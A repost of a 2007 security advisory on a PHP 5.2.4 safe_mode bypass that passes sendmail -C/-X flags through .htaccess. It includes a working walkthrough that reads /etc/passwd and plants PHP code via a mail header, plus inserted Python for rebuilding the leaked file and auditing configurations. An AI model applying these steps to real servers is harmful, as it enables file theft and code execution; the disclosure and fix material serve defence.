[zt]PHP 5.2.4 mail.force_extra_parameters unsecure

Published on 2007 - 11 - 26

Another safe_mode bypass; the interesting part is that this one goes through .htaccess. So as long as that file is writable, or a writable web directory does not yet contain one, it can be exploited.
P.S.: going through mail.force_extra_parameters really does look like the old mail() function safe_mode bypass vulnerability.


Topic : PHP 5.2.4 mail.force_extra_parameters unsecure
SecurityAlert : 47
CVE : CVE-2007-3378
SecurityRisk : Medium alert
Remote Exploit : No
Local Exploit : Yes
Exploit Given : Yes
Credit : Maksymilian Arciemowicz
Date : 25.11.2007

Affected Software : PHP <= 5.2.4


Advisory Text :



-----BEGIN PGP SIGNED MESSAGE-----

Hash: SHA1



[PHP 5.2.4 mail.force_extra_parameters unsecure ]



Author: Maksymilian Arciemowicz (cXIb8O3)

SecurityReason

Date:

- Written: 06.09.2007
- Public: 0x.0x.2007


SecurityReason Research
SecurityAlert Id: 47

CVE: CVE-2007-3378
SecurityRisk: Medium

Affected Software: PHP <= 5.2.4
Advisory URL:
http://securityreason.com/achievement_securityalert/47
Vendor: http://www.php.net

--- 0. Description ---


PHP is an HTML-embedded scripting language. Much of its syntax is
borrowed from C, Java and Perl with a couple of unique
PHP-specific features thrown in. The goal of the language is to
allow web developers to write dynamically generated pages
quickly.
When using PHP as an Apache module, you can also change the
configuration settings using directives in Apache configuration
files (e.g. httpd.conf) and .htaccess files. You will need
"AllowOverride Options" or "AllowOverride
All" privileges to do so.

php_value name value

Sets the value of the specified directive. Can be used only with
PHP_INI_ALL and PHP_INI_PERDIR type directives. To clear a
previously set value use none as the value.
Note: Don't use php_value to set boolean values. php_flag (see
below) should be used instead.

php_flag name on|off

Used to set a boolean configuration directive. Can be used only
with PHP_INI_ALL and PHP_INI_PERDIR type directives.

mail.force_extra_parameters - Force the addition of the specified
parameters to be passed as extra parameters to the sendmail
binary. These parameters will always replace the value of the 5th
parameter to mail(), even in safe mode

http://pl.php.net/manual/en/configuration.changes.php

--- 1. htaccess safemode and open_basedir Bypass Vulnerability per mail.force_extra_parameters ---



We have received a lot of questions about the news item http://securityreason.com/news/0/0x1f, so we will show how to exploit this issue. When using PHP as an Apache module, you can also change configuration settings using directives in an .htaccess file, and it is possible to bypass safe_mode or open_basedir through mail.force_extra_parameters. On a lot of servers the MTA is sendmail; it can also be exim etc., but we show how to exploit this for the most widespread one (sendmail).

For example, you can set mail.force_extra_parameters via .htaccess.



cxib# curl -I http://localhost:82
HTTP/1.1 200 OK
Date: Thu, 06 Sep 2007 22:18:35 GMT
Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.4
Last-Modified: Sat, 20 Nov 2004 20:16:24 GMT
ETag: "27e4f0-2c-4c23b600"
Accept-Ranges: bytes
Content-Length: 44
Content-Type: text/html

Apache 2.2.4 and PHP 5.2.4. Let's look at the folder "/narkotyk" on localhost:82.



cxib# ls -la
total 10
drwxrwxrwx 2 www www 512 Sep 7 00:26 .
drwxr-xr-x 4 www wheel 512 Sep 7 00:22 ..
-rw-r--r-- 1 www www 106 Sep 7 00:25 .htaccess
-rw-r--r-- 1 www www 29 Sep 7 00:25 file1.php
-rw-r--r-- 1 www www 56 Sep 7 00:26 file2.php

cxib# cat file1.php
<? include("/etc/passwd"); ?>



cxib# curl http://localhost:82/narkotyk/file1.php
<br />
<b>Warning</b>: include() [<a href='function.include'>function.include</a>]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /etc/passwd owned by uid 0 in <b>/usr/local/www/apache22/data/narkotyk/file1.php</b> on line <b>1</b><br />
<br />
<b>Warning</b>: include(/etc/passwd) [<a href='function.include'>function.include</a>]: failed to open stream: Invalid argument in <b>/usr/local/www/apache22/data/narkotyk/file1.php</b> on line <b>1</b><br />
<br />
<b>Warning</b>: include() [<a href='function.include'>function.include</a>]: Failed opening '/etc/passwd' for inclusion (include_path='.:') in <b>/usr/local/www/apache22/data/narkotyk/file1.php</b> on line <b>1</b><br />

So safe_mode is on.
Let's look at .htaccess and file2.php:



cxib# cat file2.php
<? var_dump(mail("root@localhost", "hallo", "root")); ?>
cxib# cat .htaccess
php_value mail.force_extra_parameters '-C /etc/passwd -X /usr/local/www/apache22/data/narkotyk/result.txt'



and let's send a request to file2.php:

cxib# curl http://localhost:82/narkotyk/file2.php
bool(false)

False!? No:

cxib# ls -la /usr/local/www/apache22/data/narkotyk/result.txt
-rw-r--r-- 1 www www 7130 Sep 7 00:31 /usr/local/www/apache22/data/narkotyk/result.txt
cxib#

result.txt has been created.

cxib# cat /usr/local/www/apache22/data/narkotyk/result.txt
69647 >>> /etc/passwd: line 3: unknown configuration line "root:*:0:0:Charlie &:/root:/bin/csh"
69647 >>> /etc/passwd: line 4: unknown configuration line "toor:*:0:0:Bourne-again Superuser:/root:"
..... etc.

We can read the file; safe_mode and open_basedir are bypassed.

It is also possible to create a file containing PHP code, but for that we need a usable sendmail.cf, because sendmail only logs the message itself (headers included) to the -X transcript once it can actually send email.



Example:

cxib# cat .htaccess
php_value mail.force_extra_parameters '-C /usr/local/www/apache22/data/narkotyk/sendmail.cf -X /usr/local/www/apache22/data/narkotyk/phpcode.php'
cxib# cat file3.php
<? var_dump(mail("root@xxxxxxxxxxxxxxxxxx", "h<? phpinfo(); ?>allo", "root")); ?>

We need to create /usr/local/www/apache22/data/narkotyk/sendmail.cf and configure it. Then:

cxib# curl http://localhost:82/narkotyk/file3.php
bool(true)
cxib#
cxib# cat phpcode.php
69755 <<< To: root@xxxxxxxxxxxxxxxxxx
69755 <<< Subject: h<? phpinfo(); ?>allo
69755 <<<
69755 <<< root
69755 <<<
69757 === CONNECT securityreason.pl
... etc



and now:

cxib# curl http://localhost:82/narkotyk/phpcode.php
69755 <<< To: root@xxxxxxxxxxxxxxxxxx
69755 <<< Subject: h<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html><head>
<style type="text/css">
body { color: #000000;}
body, td, th, h1, h2 {font-family: sans-serif;}
... phpinfo().

This was an example for PHP 5.2.4 with sendmail, but we think it is possible to exploit exim and other mail programs too. In PHP 5.2.4 mail.force_extra_parameters is filtered through php_escape_shell_cmd(), but we don't need to bypass this function: the escaping only neutralises shell metacharacters, plain flags and paths pass through untouched, and the file access is performed by sendmail itself.
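The transcript that -X writes is a plain per-process log, so both halves of the walkthrough above (pulling /etc/passwd back out of the "unknown configuration line" errors, and checking where the PHP in the Subject header lands) can be done mechanically. The following Python is an added example, not part of the advisory and not code from PHP or sendmail: it parses the sendmail -X line format shown above, rebuilds the file read through -C by line number, and lists logged message lines that carry a PHP open tag. SAMPLE_TRANSCRIPT is constructed from the listings in the advisory (the pid values and the daemon line are made up); the treatment of lines that sendmail accepts without complaint is an assumption about its config parser, stated in the comments.

```python
"""Parse a sendmail -X transcript produced via mail.force_extra_parameters (added example)."""
import re

# Constructed sample modelled on the advisory's result.txt and phpcode.php listings; not real captured data.
SAMPLE_TRANSCRIPT = """\
69647 >>> /etc/passwd: line 3: unknown configuration line "root:*:0:0:Charlie &:/root:/bin/csh"
69647 >>> /etc/passwd: line 4: unknown configuration line "toor:*:0:0:Bourne-again Superuser:/root:"
69647 >>> /etc/passwd: line 5: unknown configuration line "daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin"
69755 <<< To: root@localhost
69755 <<< Subject: h<? phpinfo(); ?>allo
69755 <<<
69755 <<< root
69755 <<<
69757 === CONNECT localhost
"""

# '<pid> >>> <path>: line <n>: unknown configuration line "<text>"': sendmail echoing a line of the
# file named by -C that it could not parse as sendmail.cf.
CONFIG_ERR = re.compile(
    r'^(?P<pid>\d+) >>> (?P<path>[^:]+): line (?P<lineno>\d+): '
    r'unknown configuration line "(?P<text>.*)"$'
)
# '<pid> <<< <text>': the message as sendmail read it on stdin (headers, blank line, body).
MSG_LINE = re.compile(r'^(?P<pid>\d+) <<< ?(?P<text>.*)$')
# A PHP open tag inside logged text means the file -X wrote will execute if it carries a .php name.
PHP_TAG = re.compile(r'<\?(?:php\b|=|\s)', re.IGNORECASE)


def recover_file(transcript, path):
    """Map line number -> content for every line of `path` that sendmail rejected and echoed."""
    lines = {}
    for raw in transcript.splitlines():
        m = CONFIG_ERR.match(raw)
        if m and m["path"] == path:
            lines[int(m["lineno"])] = m["text"]
    return lines


def render_recovered(lines, gap="# <not echoed>"):
    """Join recovered lines in order, leaving a visible marker for lines sendmail accepted silently.
    Blank lines and '#' lines are sendmail.cf comments (which is why the advisory's dump starts at
    line 3 of a FreeBSD /etc/passwd); any line that happens to parse as valid sendmail.cf syntax is
    assumed (not verified here) to be swallowed the same way."""
    if not lines:
        return ""
    return "\n".join(lines.get(i, gap) for i in range(1, max(lines) + 1))


def logged_message(transcript, pid):
    """The message sendmail logged for one delivery attempt, one entry per '<<<' line."""
    out = []
    for raw in transcript.splitlines():
        m = MSG_LINE.match(raw)
        if m and int(m["pid"]) == pid:
            out.append(m["text"])
    return out


def php_payload_lines(transcript):
    """Logged lines carrying a PHP open tag: the attacker-controlled text that turns the -X
    transcript into an executable script when the target path ends in .php."""
    hits = []
    for raw in transcript.splitlines():
        m = MSG_LINE.match(raw)
        if m and PHP_TAG.search(m["text"]):
            hits.append(m["text"])
    return hits


if __name__ == "__main__":
    print(render_recovered(recover_file(SAMPLE_TRANSCRIPT, "/etc/passwd")))
    print(php_payload_lines(SAMPLE_TRANSCRIPT))
```

Run against a real result.txt, recover_file gives back the readable part of the target; the gap markers show which lines were lost to sendmail's comment handling, so a dump that looks complete is not mistaken for one that is.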


--- mail.c ---
if (force_extra_parameters) {
    extra_cmd = php_escape_shell_cmd(force_extra_parameters);
} else if (extra_cmd) {
    extra_cmd = php_escape_shell_cmd(extra_cmd);
}
--- mail.c ---


Interesting is:

--- mail.c ---
if (PG(safe_mode) && (ZEND_NUM_ARGS() == 5)) {
    php_error_docref(NULL TSRMLS_CC, E_WARNING, "SAFE MODE Restriction in effect. The fifth parameter is disabled in SAFE MODE.");
    RETURN_FALSE;
}
--- mail.c ---


The 5th parameter of mail() is checked; mail.force_extra_parameters is not.

Before the public advisory we tested the issue and sent the advisory to the PHP Team. The main problem is that we did not receive any answer. We did not check the patch for CVE-2007-3378 (SREASONRES:20070627), but we are using CVE-2007-3378 for identification.

http://securityreason.com/achievement_securityalert/47

php_escape_shell_cmd() is not the reason for CVE-2007-3378.

--- 2. Exploit ---

SecurityReason will not publish an official exploit for this issue.
Anybody can exploit this themselves.


--- 3. How to fix ---

--- note from SREASONRES:20070627 ---
This bug was found in February 2007.
We contacted the PHP Team again.
With the co-operation of Stanislav Malyshev from the PHP Team, PHP 5.2.5 is now fully patched against the "mail.force_extra_parameters" issue.
--- note from SREASONRES:20070627 ---

Update to PHP 5.2.5.
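Since the fix is a PHP upgrade, the checks a practitioner wants on a server are whether .htaccess can still set this directive at all, and whether any .htaccess under the docroot already does. The Python below is an added example, not code from SecurityReason or PHP: it parses php_value/php_flag lines with Apache-style quoting, pulls out the -C/-X file arguments the advisory abuses, walks a document root for .htaccess files (or world-writable directories with none, the condition the blog intro points at), and checks a httpd.conf fragment for the two settings that close the hole regardless of PHP version: php_admin_value mail.force_extra_parameters none (admin values cannot be overridden per directory, and "none" clears the value as described in section 0) or AllowOverride None. The .htaccess text is the advisory's; the httpd.conf fragments, directory names and the helper names are constructed for the example, and the AllowOverride check is deliberately coarse (it does not resolve which <Directory> block applies to a path).

```python
"""Audit Apache per-directory PHP overrides for the mail.force_extra_parameters bypass (added example)."""
import os
import shlex
import shutil
import stat
import tempfile

# PHP ini directives whose value ends up on the sendmail command line.
MAIL_DIRECTIVES = {"mail.force_extra_parameters", "sendmail_path"}
# sendmail flags the advisory abuses: -C parses any file as sendmail.cf, -X appends a transcript to any path.
FILE_FLAGS = ("-C", "-X")

# Constructed samples: WEAK_HTACCESS is the advisory's .htaccess; the httpd.conf fragments are assumed.
WEAK_HTACCESS = (
    "php_value mail.force_extra_parameters "
    "'-C /etc/passwd -X /usr/local/www/apache22/data/narkotyk/result.txt'\n"
)
WEAK_HTTPD_CONF = """\
<Directory "/usr/local/www/apache22/data">
    AllowOverride All
</Directory>
"""
HARDENED_HTTPD_CONF = """\
<Directory "/usr/local/www/apache22/data">
    AllowOverride None
</Directory>
# php_admin_value cannot be overridden by php_value in .htaccess; 'none' clears the directive.
php_admin_value mail.force_extra_parameters none
"""


def parse_php_directives(text):
    """Yield (directive, name, value) for php_value/php_flag/php_admin_* lines, honouring Apache quoting."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        try:
            words = shlex.split(line)
        except ValueError:  # unbalanced quote: Apache would refuse the file anyway
            continue
        if len(words) >= 3 and words[0].lower() in (
            "php_value", "php_flag", "php_admin_value", "php_admin_flag"
        ):
            yield words[0].lower(), words[1], " ".join(words[2:])


def sendmail_file_args(value):
    """Return [(flag, path)] for every -C/-X in a sendmail argument string ('-Cpath' and '-C path' forms)."""
    found, toks, i = [], value.split(), 0
    while i < len(toks):
        tok = toks[i]
        if tok[:2] in FILE_FLAGS:
            if len(tok) > 2:
                found.append((tok[:2], tok[2:]))
            else:
                i += 1
                found.append((tok, toks[i] if i < len(toks) else ""))
        i += 1
    return found


def audit_htaccess(text):
    """Findings for every mail-related PHP directive in one .htaccess body."""
    return [
        {"directive": d, "name": n, "value": v, "file_args": sendmail_file_args(v)}
        for d, n, v in parse_php_directives(text)
        if n in MAIL_DIRECTIVES
    ]


def main_config_locks(httpd_conf):
    """True if httpd.conf pins the directive with php_admin_value or disables .htaccess overrides.
    Coarse on purpose: it does not work out which <Directory> block applies to a given path."""
    pinned = any(
        d == "php_admin_value" and n == "mail.force_extra_parameters"
        for d, n, _ in parse_php_directives(httpd_conf)
    )
    no_override = any(
        line.split()[:2] == ["AllowOverride", "None"] for line in httpd_conf.splitlines()
    )
    return pinned or no_override


def scan_tree(docroot):
    """Walk docroot: report .htaccess files carrying mail directives or writable by others, and
    world-writable directories with no .htaccess yet (any local user could drop one there)."""
    report = {}
    for d, _, files in os.walk(docroot):
        ht = os.path.join(d, ".htaccess")
        dir_ww = bool(os.stat(d).st_mode & stat.S_IWOTH)
        if ".htaccess" in files:
            with open(ht, encoding="utf-8", errors="replace") as fh:
                findings = audit_htaccess(fh.read())
            file_ww = bool(os.stat(ht).st_mode & stat.S_IWOTH)
            if findings or file_ww:
                report[d] = {"findings": findings, "world_writable": file_ww, "missing": False}
        elif dir_ww:
            report[d] = {"findings": [], "world_writable": True, "missing": True}
    return report


def demo_scan():
    """Build a throwaway docroot mirroring the advisory's layout, scan it, return {dirname: entry}."""
    root = tempfile.mkdtemp()
    try:
        vuln = os.path.join(root, "narkotyk")  # drwxrwxrwx with the advisory's .htaccess
        os.mkdir(vuln)
        with open(os.path.join(vuln, ".htaccess"), "w") as fh:
            fh.write(WEAK_HTACCESS)
        os.chmod(vuln, 0o777)
        empty = os.path.join(root, "uploads")  # world-writable, no .htaccess yet (assumed name)
        os.mkdir(empty)
        os.chmod(empty, 0o777)
        os.mkdir(os.path.join(root, "static"))  # default mode, nothing to report
        return {os.path.basename(d): e for d, e in scan_tree(root).items()}
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for name, entry in demo_scan().items():
        print(name, entry)
    print("hardened:", main_config_locks(HARDENED_HTTPD_CONF), "weak:", main_config_locks(WEAK_HTTPD_CONF))
```

sendmail_path is audited alongside mail.force_extra_parameters because, where safe_mode is off, the same flags can be smuggled in through that directive instead; the -C/-X extraction is the same for both.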

--- 4. Greets ---


For: sp3x, Infospec, p_e_a, l5x and Stefan Esser

--- 5. Contact ---


Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (FreeBSD)

iD8DBQFHSZ1w3Ke13X/fTO4RAnKnAJ0drPZhrdtiheaR9b8mLZ0IjyJoIQCfZC3A
jn8i1L2eCHVS1jBuN24ySc0=
=ZCW0
-----END PGP SIGNATURE-----
